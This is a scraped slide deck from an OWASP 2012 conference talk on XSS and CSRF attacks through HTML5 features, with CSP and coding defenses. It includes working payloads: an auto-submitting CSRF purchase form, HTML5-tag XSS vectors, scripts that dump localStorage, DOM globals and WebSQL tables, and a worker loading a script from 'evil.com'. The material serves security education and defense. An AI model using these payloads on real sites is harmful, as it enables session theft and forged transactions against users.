SlideShare a Scribd company logo
1 of 73
XSS & CSRF with HTML5
              Attack, Exploit and Defense



                            Shreeraj Shah
                            Blueinfy Solutions Pvt. Ltd.
                            shreeraj.shah@blueinfy.net


OWASP
OWASP AppSecUSA 2012

                       Copyright © The OWASP Foundation
                       Permission is granted to copy, distribute and/or modify this document
                       under the terms of the OWASP License.




                       The OWASP Foundation
                       http://www.owasp.org
http://shreeraj.blogspot.com
                                                              http://shreeraj.blogspot.com
                                                               shreeraj@blueinfy.com
                                                              shreeraj@blueinfy.com
                                                               http://www.blueinfy.com
       Who Am I?                                              http://www.blueinfy.com
                                                              Twitter --@shreeraj
                                                               Twitter @shreeraj

 Founder & Director
     Blueinfy & iAppSecure Solutions Pvt. Ltd.
 Past experience
     Net Square (Founder), Foundstone (R&D/Consulting), Chase(Middleware), IBM (Domino
      Dev)
 Interest
     Web security research
 Published research
     Articles / Papers – Securityfocus, O’erilly, DevX, InformIT etc.
     Tools – DOMScan, DOMTracer, wsScanner, scanweb2.0, AppMap, AppCodeScan,
      AppPrint etc.
     Advisories - .Net, Java servers etc.
     Presented at Blackhat, RSA, InfoSecWorld, OSCON, OWASP, HITB, Syscan, DeepSec etc.
 Books (Author)
     Web 2.0 Security – Defending Ajax, RIA and SOA
     Hacking Web Services
     Web Hacking




                                                                            OWASP
                                            2
HTML5 VECTORS – ATTACK
SURFACE
                         OWASP
              3
HTML5 – Attacks on the rise …




Evolution of HTML5
   1991 – HTML started (plain and simple)
   1996 – CSS & JavaScript (Welcome to world of XSS and browser security)
   2000 – XHTML1 (Growing concerns and attacks on browsers)
   2005 – AJAX, XHR, DOM – (Attack cocktail and surface expansion)
   2009 – HTML5 (Here we go… new surface, architecture and defense) –
    HTML+CSS+JS

                                                                             OWASP
                                                               4
Modern Browser Model
                                                                                       Mobile



        HTML5 + CSS                      Silverlight                Flash
API (Media, Geo etc.) & Messaging                      Plug-In
                                                                                     Presentation


                    JavaScript          DOM/Events             Parser/Threads
                                                                                 Process & Logic
                      WebSQL                      Cache            Storage
                                                      FileSystem

                   XHR 1 & 2             WebSocket             Plug-in Sockets
                               Browser Native Network Services                           Network
                                                                                         & Access


                  SOP/CORS/Content-Sec                       Sandbox                      Core
                                                                                          Policies

                                                                                 OWASP
                                              5
HTML5 Architecture & Threat Model


                                   User Interface
                                                                                             Cross Domain
                                                                                             Application
                                             Sandbox (Origin – Policy )

                                        HTML/CSS



Single
                           JavaScript                                             Internet
DOM/Page
Application
                                                                    XHR                       Target
                                              DOM                   WebSockets                Application
                                                                    Native




              Storage, WebSQL, IndexedDB Messaging APIs   Geolocation and other
                FileSystem, Cache - APIs                         APIs



                                                                                                  OWASP
                                                               6
CSRF WITH HTML5


                  OWASP
             7
CSRF Attack Vector



                                            ge                    Attacker’s
                                        a          RF
                                r’   sp    s     CS                  Site                Authentication
                             ke
                              c         nd                                                  Server
                          tta       r se a d
                      it A        ke ylo
                  Vis         t ac pa
                           At



                                             CSRF Attack – with session
                                                      Login

                                                  Success – cookie set
                                                       Success
                                                                               Web Store             Database
  Client/Victim
                                                                               Application            Server
    Browser
                                                                                 Server



                                                         Successful exploitation …
                                                         •SOP bypass
                                                         •Cookie Replay


                                                                                                    OWASP
                                                              8
SOP bypass and Cookie Replay – Basic Type
      GET Request
       IMG SRC
      <img src="http://host/?command">

      SCRIPT SRC
      <script src="http://host/?command">

      IFRAME SRC
      <iframe src="http://host/?command">

            POST Request

            <script type="text/javascript" language="JavaScript">
               document.foo.submit();
            </script>
                                                                    OWASP
                                     9
Streams – name/value pairs are gone …

                                        JSON




                  XML                          JS-Script




                                                 JS-Object
               JS-Array




                                                  OWASP
                          10
CSRF injection – splitting and forcing …

<html>
<body>
<FORM NAME="buy" ENCTYPE="text/plain"
action="http://trade.example.com/xmlrpc/trade.rem" METHOD="POST">
    <input type="hidden" name='<?xml version' value='"1.0"?
><methodCall><methodName>stocks.buy</methodName><params><param
><value><string>MSFT</string></value></param><param><value><double>2
6</double></value></param></params></methodCall>'>
</FORM>
<script>document.buy.submit();</script>
</body>
</html>




                                                          OWASP
                                11
CSRF with XHR and CORS bypass
                                                                                     Mobile



        HTML5 + CSS                      Silverlight              Flash
API (Media, Geo etc.) & Messaging                      Plug-In
                                                                                   Presentation


                    JavaScript          DOM/Events          Parser/Threads
                                                                              Process & Logic
                      WebSQL                      Cache          Storage


                   XHR 1 & 2             WebSocket          Plug-in Sockets
                               Browser Native Network Services                       Network
                                                                                     & Access


                         SOP/CORS                          Sandbox                     Core
                                                                                       Policies

                                                                               OWASP
                                             12
XHR – Level 2 powering CSRF

XHR object of HTML5 is very powerful
   Allows interesting features like cross origin request and
    binary upload/download
xhr.responseType can be set to "text", "arraybuffer",
 "document“ and "blob“
Also, for posting data stream - DOMString,
 Document, FormData, Blob, File, ArrayBuffer etc…




                                                      OWASP
                              13
CORS & XHR – ingredients for CSRF

Before HTML5 – Cross Domain was not possible
 through XHR (SOP applicable)
HTML5 – allows cross origin calls with XHR-Level 2
 calls
CORS – Cross Origin Resource Sharing needs to be
 followed (Option/Preflight calls)
Adding extra HTTP header (Access-Control-Allow-
 Origin and few others)



                                              OWASP
                         14
CORS based HTTP Headers

Request
  Origin
  Access-Control-Request-Method (preflight)
  Access-Control-Request-Headers (preflight)
Response
  Access-Control-Allow-Origin
  Access-Control-Allow-Credentials
  Access-Control-Allow-Expose-Headers
  Access-Control-Allow-Max-Age (preflight)
  Access-Control-Allow-Allow-Methods (preflight)
  Access-Control-Allow-Allow-Headers (preflight)


                                                   OWASP
                                 15
XHR – Stealth POST/GET

CSRF – powered by CORS and XHR
  Hence, allow stealth channel and possible silent
   exploitation
  One way CSRF with any stream since XHR allows raw
   stream from browser (XML, JSON, Binary as well)
  Two way CSRF (POST and read both – in case of allow set
   to *)




                                                  OWASP
                           16
Exploiting the use case

CORS preflight bypass – certain Content-Type bypass
 preflight HTTP
Forcing cookie replay by “withCredentials”
Internal network scanning and tunneling
Information harvesting (internal crawling)
Stealth browser shell – post XSS (Allow origin- *)
Business functionality abuse (upload and binary
 streams)


                                            OWASP
                          17
CSRF with XHR/HTML5



                                                                   Authentication
                                             User                     Server
                                          establishing
                                            Session



                  Login request (HTTPS)

                      Session cookie
                                                         Web Store             Database
  Client/Victim
                                                         Application            Server
    Browser
                                                           Server




                                                                              OWASP
                                18
CSRF with XHR/HTML5



                  Browser using
                    XHR Call                                            Authentication
                   JavaScript                   User making                Server
                                                 a buy over
                                                   HTTP



                      Placing an order (JSON services)

                                   Success
                                                              Web Store             Database
  Client/Victim
                                                              Application            Server
    Browser
                                                                Server




                                                                                   OWASP
                                         19
CSRF with XHR/HTML5



                                            ge               Attacker’s
                                        a          RF
                                r’   sp    s     CS             Site
                                                                           Session is
                                                                                             Authentication
                             ke
                              c         nd                                                      Server
                          tta       r se a d                              still live – not
                      it A        ke ylo
                  Vis         t ac pa                                      yet logged
                           At
                                                                                  out




                                                                                   Web Store             Database
  Client/Victim
                                                                                   Application            Server
    Browser
                                                                                     Server
                       Leveraging XHR Call
                       • Content-type to avoid pre flight
                       • “withCredentials” set to true




                                                                                                        OWASP
                                                        20
CSRF & HTML5




                    OWASP
               21
CSRF with XHR/HTML5



                                            ge                      Attacker’s
                                        a          RF
                                r’   sp    s     CS                    Site                  Authentication
                             ke
                              c         nd                                                      Server
                          tta       r se a d
                      it A        ke ylo
                  Vis         t ac pa
                           At



                                            XHR initiates HTTP buy request

                                                 Success – cookie replayed
                                                                                   Web Store             Database
  Client/Victim
                                                                                   Application            Server
    Browser
                                                                                     Server
                                                           Hence,
                                                           • Without victim’s consent or notice               Got it
                                                           • Stealth HTTP request generated
                                                           • Silent Exploitation takes place



                                                                                                        OWASP
                                                               22
CSRF & HTML5




                    OWASP
               23
CSRF with XHR/HTML5



                   Browser is
                  having Form
                   (multi-part)                       Business           Authentication
                                                                            Server
                                                        layer
                                                     function of
                                                     uploading


                             Uploading bulk orders

                                    Success
                                                                   Web Store         Database
  Client/Victim
                                                                   Application        Server
    Browser
                                                                     Server




                                                                                    OWASP
                                           24
CSRF/Upload - POC




                         OWASP
                    25
CSRF with XHR/HTML5



                                            ge                      Attacker’s
                                        a          RF
                                r’   sp    s     CS                    Site                  Authentication
                             ke
                              c         nd                                                      Server
                          tta       r se a d
                      it A        ke ylo
                  Vis         t ac pa
                           At



                                     XHR initiates HTTP multi-part - Upload

                                                 Success – cookie replayed
                                                                                   Web Store             Database
  Client/Victim
                                                                                   Application            Server
    Browser
                                                                                     Server
                                                           Hence,
                                                           • Without victim’s consent or notice               Got it
                                                           • Stealth HTTP Upload takes place
                                                           • Silent Exploitation…



                                                                                                        OWASP
                                                               26
CSRF/Upload




                   OWASP
              27
Internal Scan – not scan but crawl as well …


                                                      Attacker’s
                                                         Site



                                      Internet
                                       Internet
                         CSRF Payload
                         And stealth channel




   Client/Victim           Intranet
                            Intranet
     Browser




                                       Internal Web       Internal HR
                   Internal Web/App
                                            Mail          Application
                         Server




                                                                        OWASP
                                           28
Internal Scan for CORS




                              OWASP
                         29
Scan and Defend

Scan and look for
  Content-Type checking on server side
  CORS policy scan
  Form and Upload with tokens or not
Defense and Countermeasures
  Secure libraries for streaming HTML5/Web 2.0 content
  CSRF protections
  Stronger CORS implementation




                                                 OWASP
                           30
XSS WITH HTML5


                  OWASP
             31
XSS with HTML5 (tags, attributes and events)
                                                                                     Mobile



        HTML5 + CSS                      Silverlight              Flash
API (Media, Geo etc.) & Messaging                      Plug-In
                                                                                   Presentation


                    JavaScript          DOM/Events          Parser/Threads
                                                                              Process & Logic
                      WebSQL                      Cache          Storage


                   XHR 1 & 2             WebSocket          Plug-in Sockets
                               Browser Native Network Services                       Network
                                                                                     & Access


                         SOP/CORS                          Sandbox                     Core
                                                                                       Policies

                                                                               OWASP
                                             32
HTML5 – Tags/Attributes/Events

Tags – media (audio/video), canvas (getImageData),
 menu, embed, buttons/commands, Form control
 (keys)
Attributes – form, submit, autofocus, sandbox,
 manifest, rel etc.
Events/Objects – Navigation (_self), Editable content,
 Drag-Drop APIs, pushState (History) etc.




                                               OWASP
                          33
XSS variants

Media tags
Examples
   <video><source onerror="javascript:alert(1)“>
   <video onerror="javascript:alert(1)"><source>




                                                    OWASP
                            34
XSS variants

Exploiting autofocus
  <input autofocus onfocus=alert(1)>
  <select autofocus onfocus=alert(1)>
  <textarea autofocus onfocus=alert(1)>
  <keygen autofocus onfocus=alert(1)>




                                           OWASP
                             35
XSS variants

Form & Button etc.
   <form id="test" /><button form="test"
    formaction="javascript:alert(1)">test
   <form><button formaction="javascript:alert(1)">test


Etc … and more …
   Nice HTML5 XSS cheat sheet (http://html5sec.org/)




                                                   OWASP
                            36
Scan and Defend

Scan and look for
  Reflected or Persistent XSS spots with HTML5 tags
Defense and Countermeasures
  Have it added on your blacklist
  Standard XSS protections by encoding




                                                   OWASP
                            37
CSP in Action – HTML5 defense …

Content Security Policy – Defending browser against
 possible post attack scenarios
   Based on Origin (SOP the key)
   Allows whitelisting mechanism for what “to do” and “not
    to do”
   It is possible to send back notification to application when
    violation takes place
   Implementation by extra HTTP headers [Brower to
    browser X-WebKit-CSP (S/C) X-Content-Security-Policy (F)]



                                                       OWASP
                              38
Blocking Scripts

Content-Security-Policy: script-src 'self‘
   Only allowing script from the self
Other mechanism
   'unsafe-inline' - blocking inline
   'unsafe-eval‘ – blocking eval type calls
Post XSS defense can be crafted




                                               OWASP
                              39
Controlling Browser

connect-src – Controlling WebSocket, XHR etc.
frame-src – Source of the frame (ClickJacking)
object-src – Flash, Silverlight etc.
media-src – controlling audio and video
img/style – image and style sources
default-src https:; - locking over SSL only




                                             OWASP
                         40
Example

 Persistent XSS injected

HTTP/1.1 200 OK
Date: Wed, 12 Sep 2012 14:40:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-WebKit-CSP: script-src 'self'
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 6146




                                              OWASP
                                         41
Storage extraction with XSS
                                                                                     Mobile



        HTML5 + CSS                      Silverlight              Flash
API (Media, Geo etc.) & Messaging                      Plug-In
                                                                                   Presentation


                    JavaScript          DOM/Events          Parser/Threads
                                                                              Process & Logic
                      WebSQL                      Cache          Storage


                   XHR 1 & 2             WebSocket          Plug-in Sockets
                               Browser Native Network Services                       Network
                                                                                     & Access


                         SOP/CORS                          Sandbox                     Core
                                                                                       Policies

                                                                               OWASP
                                             42
Web Storage Extraction

Browser has one place to store data – Cookie
 (limited and replayed)
HTML5 – Storage API provided (Local and Session)
Can hold global scoped variables
http://www.w3.org/TR/webstorage/




                                            OWASP
                         43
Web Storage Extraction

It is possible to steal them through XSS or via
 JavaScript
Session hijacking – HttpOnly of no use
getItem and setItem calls




XSS the box and scan through storage


                                                   OWASP
                           44
Blind storage enumeration

if(localStorage.length){
          console.log(localStorage.length)
          for(i in localStorage){
                     console.log(i)
                     console.log(localStorage.getItem(i));
          }
}
Above code allows all storage variable extraction




                                                             OWASP
                                       45
File System Storage

HTML5 provides virtual file system with filesystem
 APIs
   window.requestFileSystem = window.requestFileSystem
    || window.webkitRequestFileSystem;
It becomes a full blown local system for application
 in sandbox
It empowers application




                                                OWASP
                           46
File System Storage

It provides temporary or permanent file system
   function init() {
       window.requestFileSystem(window.TEMPORARY, 1024*1024,
          function(filesystem) {
         filesys = filesystem;
       }, catcherror);
   }
 App can have full filesystem in place now.




                                                         OWASP
                                 47
Sensitive information filesystem

Assuming app is creating profile on local system




                                              OWASP
                          48
Extraction through XSS

Once have an entry point – game over!




                                         OWASP
                         49
Single DOM/One Page App - XSS

Applications run with “rich” DOM
JavaScript sets several variables and parameters
 while loading – GLOBALS
It has sensitive information and what if they are
 GLOBAL and remains during the life of application
It can be retrieved with XSS
HTTP request and response are going through
 JavaScripts (XHR) – what about those vars?



                                             OWASP
                         50
Blind Enumeration


for(i in window){
  obj=window[i];
   try{
        if(typeof(obj)=="string"){
           console.log(i);
           console.log(obj.toString());
        }
     }catch(ex){}
}




                                               OWASP
                                          51
Global Sensitive Information Extraction from DOM

HTML5 apps running on Single DOM
Having several key global variables, objects and array
   var arrayGlobals =
    ['my@email.com',"12141hewvsdr9321343423mjfdvint","t
    est.com"];
Post DOM based exploitation possible and harvesting
 all these values.




                                                   OWASP
                            52
Global Sensitive Information Extraction from DOM
for(i in window){
  obj=window[i];
  if(obj!=null||obj!=undefined)
      var type = typeof(obj);
      if(type=="object"||type=="string")
      {
           console.log("Name:"+i)
           try{
              my=JSON.stringify(obj);
              console.log(my)
           }catch(ex){}
       }
}



                                                      OWASP
                                           53
Scan and Defend

Scan and look for
  Scanning storage
Defense and Countermeasures
  Do not store sensitive information on localStorage and
   Globals
  XSS protection




                                                   OWASP
                            54
SQLi & Blind Enumeration through XSS
                                                                                     Mobile



        HTML5 + CSS                      Silverlight              Flash
API (Media, Geo etc.) & Messaging                      Plug-In
                                                                                   Presentation


                    JavaScript          DOM/Events          Parser/Threads
                                                                              Process & Logic
                      WebSQL                      Cache          Storage


                   XHR 1 & 2             WebSocket          Plug-in Sockets
                               Browser Native Network Services                       Network
                                                                                     & Access


                         SOP/CORS                          Sandbox                     Core
                                                                                       Policies

                                                                               OWASP
                                             55
SQL Injection

WebSQL is part of HTML 5 specification, it provides
 SQL database to the browser itself.
Allows one time data loading and offline browsing
 capabilities.
Causes security concern and potential injection
 points.
Methods and calls are possible




                                              OWASP
                          56
SQL Injection

Through JavaScript one can harvest entire local
 database.
Example




                                              OWASP
                         57
Blind WebSQL Enumeration

var dbo;
var table;
var usertable;
for(i in window){
            obj = window[i];
            try{
                     if(obj.constructor.name=="Database"){
                              dbo = obj;
                                       obj.transaction(function(tx){
                                       tx.executeSql('SELECT name FROM sqlite_master WHERE type='table'',
       [],function(tx,results){

     table=results;
                                  },null);
                          });
                 }
        }catch(ex){}
}
if(table.rows.length>1)
          usertable=table.rows.item(1).name;



                                                                                                      OWASP
                                                         58
Blind WebSQL Enumeration

We will run through all objects and get object where
 constructor is “Database”
We will make Select query directly to sqlite_master
 database
We will grab 1st table leaving webkit table on 0th entry




                                                 OWASP
                           59
Blind WebSQL Enumeration




                           OWASP
                      60
Web Messaging and Worker Injection
                                                                                     Mobile



        HTML5 + CSS                      Silverlight              Flash
API (Media, Geo etc.) & Messaging                      Plug-In
                                                                                   Presentation


                    JavaScript          DOM/Events          Parser/Threads
                                                                              Process & Logic
                      WebSQL                      Cache          Storage


                   XHR 1 & 2             WebSocket          Plug-in Sockets
                               Browser Native Network Services                       Network
                                                                                     & Access


                         SOP/CORS                          Sandbox                     Core
                                                                                       Policies

                                                                               OWASP
                                             61
Web Messaging

 HTML5 is having new interframe communication system
  called Web Messaging.
 By postMessage() call parent frame/domain can call with
  the iframe
 Iframe can be loaded on cross domain. Hence, create
  issues – data/information validation & data leakage by
  cross posting possible
 worker.webkitPostMessage – faster transferable objects




                                                 OWASP
                           62
Web Messaging - Scenario

If postMessage() is set to * so page can be loaded in
 iframe and messaging can be hijacked
Also, origin is not set to fixed then again frame listen
 from any domian – again an issue
Stream coming needs to be checked before
 innerHTML or eval()
Iframe or Web Worker can glue two streams – same
 domain or cross domain




                                                 OWASP
                           63
Origin check




                    OWASP
               64
Web Worker – Hacks!

Web Workers allows threading into HTML pages
 using JavaScript
No need to use JavaScript calls like
 setTimeout(), setInterval(), XMLHttpRequest, and
 event handlers
Totally Async and well supported
   [initialize] var worker = new Worker('task.js');
   [Messaging] worker.postMessage();




                                                      OWASP
                                65
Web Worker – Hacks!

                                                  Web Page
                                                 Current DOM



                                        Web Worker
   XHR, Location, Navigator etc.


        JavaScript Runtime Browser
                 Platform                            Background
                                                     Thread on same
    Scope and Object – No DOM Access                 page - messaging


               Regex, Array, JSON etc…



                                                               OWASP
                                   66
Web Worker – Hacks!

Security issues
  It is not allowing to load cross domain worker scripts.
   (http:, https:,javascript:,data : -No)
  It has some typical issues
      It allows the use of XHR. Hence, in-domain and CORS requests
       possible
      It can cause DoS – if user get stream to run JavaScript in worker
       thread. Don’t have access to parent DOM though
      Message validation needed – else DOM based XSS




                                                               OWASP
                                  67
Web Worker – Hacks!

 Exmaple
<html>
<button onclick="Read()">Read Last Message</button>
<button onclick="stop()">Stop</button>
<output id="result"></output>

<script>
  function Read() {
    worker.postMessage({'cmd': 'read', 'msg': 'last'});
  }

 function stop() {
   worker.postMessage({'cmd': 'stop', 'msg': 'stop it'});
   alert("Worker stopped");
 }

 var worker = new Worker('message.js');

  worker.addEventListener('message', function(e) {
    document.getElementById('result').innerHTML = e.data;
  }, false);
</script>
</html>




                                                            OWASP
                                              68
Web Workers – Hacks!

Possible to cause XSS
   Running script
   Passing hidden payload
Also, web workers can help in embedding silent
 running js file and can be controlled.
Can be a tool for payload delivery and control within
 browser framework
importScripts("http://evil.com/payload.js") – worker
 can run cross domain script



                                              OWASP
                             69
Scan and Defend

Scan and look for
  JavaScript scanning
  Messaging and Worker implementation
  DOM calls
  Use of eval(), document.* calls etc.
Defense and Countermeasures
  Same origin listening is a must for messaging event
  Secure JavaScript coding




                                                    OWASP
                            70
APIs …

HTML5 few other APIs are interesting from security
 standpoint
   File APIs – allows local file access and can mixed with
    ClickJacking and other attacks to gain client files.
   Drag-Drop APIs – exploiting self XSS and few other tricks,
    hijacking cookies …
    Lot more to explore and defend…




                                                      OWASP
                              71
Resources/References

http://www.html5rocks.com/en/ (Solid stuff)
https://www.owasp.org/index.php/HTML5_Security
 _Cheat_Sheet (OWASP stuff)
http://html5sec.org/ (Quick Cheat sheet)
http://html5security.org/ (Good resources)
http://blog.kotowicz.net/ (Interesting work)




                                        OWASP
                       72
http://shreeraj.blogspot.com
                  http://shreeraj.blogspot.com
                   shreeraj@blueinfy.com
                  shreeraj@blueinfy.com
                   http://www.blueinfy.com
                  http://www.blueinfy.com




CONCLUSION AND QUESTIONS


                                  OWASP
             73

More Related Content

What's hot

Spring Framework - Spring Security
Spring Framework - Spring SecuritySpring Framework - Spring Security
Spring Framework - Spring SecurityDzmitry Naskou
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practicesScott Hurrey
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourSoroush Dalili
 
Web Application Security and Awareness
Web Application Security and AwarenessWeb Application Security and Awareness
Web Application Security and AwarenessAbdul Rahman Sherzad
 
RIA Cross Domain Policy
RIA Cross Domain PolicyRIA Cross Domain Policy
RIA Cross Domain PolicyNSConclave
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryDaniel Miessler
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protectionamiable_indian
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host headerSergey Belov
 
Introduction à spring boot
Introduction à spring bootIntroduction à spring boot
Introduction à spring bootAntoine Rey
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...Mario Heiderich
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricksGarethHeyes
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacksDefconRussia
 
Secure your app with keycloak
Secure your app with keycloakSecure your app with keycloak
Secure your app with keycloakGuy Marom
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingAnurag Srivastava
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersKrzysztof Kotowicz
 
Bootstrap 3
Bootstrap 3Bootstrap 3
Bootstrap 3Lanh Le
 

What's hot (20)

Spring Framework - Spring Security
Spring Framework - Spring SecuritySpring Framework - Spring Security
Spring Framework - Spring Security
 
Secure coding practices
Secure coding practicesSecure coding practices
Secure coding practices
 
Développement web mobile avec IONIC 2
Développement web mobile avec IONIC 2Développement web mobile avec IONIC 2
Développement web mobile avec IONIC 2
 
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ BehaviourWAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
WAF Bypass Techniques - Using HTTP Standard and Web Servers’ Behaviour
 
Web Application Security and Awareness
Web Application Security and AwarenessWeb Application Security and Awareness
Web Application Security and Awareness
 
RIA Cross Domain Policy
RIA Cross Domain PolicyRIA Cross Domain Policy
RIA Cross Domain Policy
 
Understanding Cross-site Request Forgery
Understanding Cross-site Request ForgeryUnderstanding Cross-site Request Forgery
Understanding Cross-site Request Forgery
 
Caching
CachingCaching
Caching
 
Advanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection ProtectionAdvanced Topics On Sql Injection Protection
Advanced Topics On Sql Injection Protection
 
Attacking thru HTTP Host header
Attacking thru HTTP Host headerAttacking thru HTTP Host header
Attacking thru HTTP Host header
 
Secure Coding for Java
Secure Coding for JavaSecure Coding for Java
Secure Coding for Java
 
Packet filtering using jpcap
Packet filtering using jpcapPacket filtering using jpcap
Packet filtering using jpcap
 
Introduction à spring boot
Introduction à spring bootIntroduction à spring boot
Introduction à spring boot
 
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
ECMAScript 6 from an Attacker's Perspective - Breaking Frameworks, Sandboxes,...
 
XSS Magic tricks
XSS Magic tricksXSS Magic tricks
XSS Magic tricks
 
HTTP HOST header attacks
HTTP HOST header attacksHTTP HOST header attacks
HTTP HOST header attacks
 
Secure your app with keycloak
Secure your app with keycloakSecure your app with keycloak
Secure your app with keycloak
 
Introduction to Web Application Penetration Testing
Introduction to Web Application Penetration TestingIntroduction to Web Application Penetration Testing
Introduction to Web Application Penetration Testing
 
SQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developersSQL Injection: complete walkthrough (not only) for PHP developers
SQL Injection: complete walkthrough (not only) for PHP developers
 
Bootstrap 3
Bootstrap 3Bootstrap 3
Bootstrap 3
 

Similar to XSS and CSRF with HTML5

HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsShreeraj Shah
 
Cross platform mobile web apps
Cross platform mobile web appsCross platform mobile web apps
Cross platform mobile web appsJames Pearce
 
Building Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web AppsBuilding Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web AppsJames Pearce
 
A Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 RevolutionA Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 RevolutionJames Pearce
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYShreeraj Shah
 
Building cross platform mobile web apps
Building cross platform mobile web appsBuilding cross platform mobile web apps
Building cross platform mobile web appsJames Pearce
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010Aditya K Sood
 
Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007ClubHack
 
JClouds at San Francisco Java User Group
JClouds at San Francisco Java User GroupJClouds at San Francisco Java User Group
JClouds at San Francisco Java User GroupMarakana Inc.
 
HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1HTML5 and the dawn of rich mobile web applications pt 1
HTML5 and the dawn of rich mobile web applications pt 1James Pearce
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserShreeraj Shah
 
HTML5: An Overview
HTML5: An OverviewHTML5: An Overview
HTML5: An OverviewNagendra Um
 
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...
[Infosecworld 08 Orlando] New Defenses for .NET Web Apps: IHttpModule in Prac...Shreeraj Shah
 
An Intro to Mobile HTML5
An Intro to Mobile HTML5An Intro to Mobile HTML5
An Intro to Mobile HTML5James Pearce
 
HTML5がIE10/Windows 8にもたらすもの
HTML5がIE10/Windows 8にもたらすものHTML5がIE10/Windows 8にもたらすもの
HTML5がIE10/Windows 8にもたらすものMicrosoft
 
Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012Shake Hooves With BeEF - OWASP AppSec APAC 2012
Shake Hooves With BeEF - OWASP AppSec APAC 2012Christian Frichot
 
Technology Trends
Technology TrendsTechnology Trends
Technology TrendsHenry Jacob
 
Find me if you can – smart fuzzing and discovery! shreeraj shah
Find me if you can – smart fuzzing and discovery!   shreeraj shahFind me if you can – smart fuzzing and discovery!   shreeraj shah
Find me if you can – smart fuzzing and discovery! shreeraj shahowaspindia
 

Similar to XSS and CSRF with HTML5 (20)

HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth ExploitsHTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
HTML5 Top 10 Threats - Silent Attacks and Stealth Exploits
 
Cross platform mobile web apps
Cross platform mobile web appsCross platform mobile web apps
Cross platform mobile web apps
 
Building Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web AppsBuilding Cloud-Based Cross-Platform Mobile Web Apps
Building Cloud-Based Cross-Platform Mobile Web Apps
 
Modern browsers
Modern browsersModern browsers
Modern browsers
 
A Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 RevolutionA Snapshot of the Mobile HTML5 Revolution
A Snapshot of the Mobile HTML5 Revolution
 
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERYFIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
FIND ME IF YOU CAN – SMART FUZZING AND DISCOVERY
 
Building cross platform mobile web apps
Building cross platform mobile web appsBuilding cross platform mobile web apps
Building cross platform mobile web apps
 
OWASP App Sec US - 2010
OWASP App Sec US - 2010OWASP App Sec US - 2010
OWASP App Sec US - 2010
 
Shreeraj - Hacking Web 2 0 - ClubHack2007
Shreeraj - Hacking Web 2 0 - ClubHack2007Shreeraj - Hacking Web 2 0 - ClubHack2007
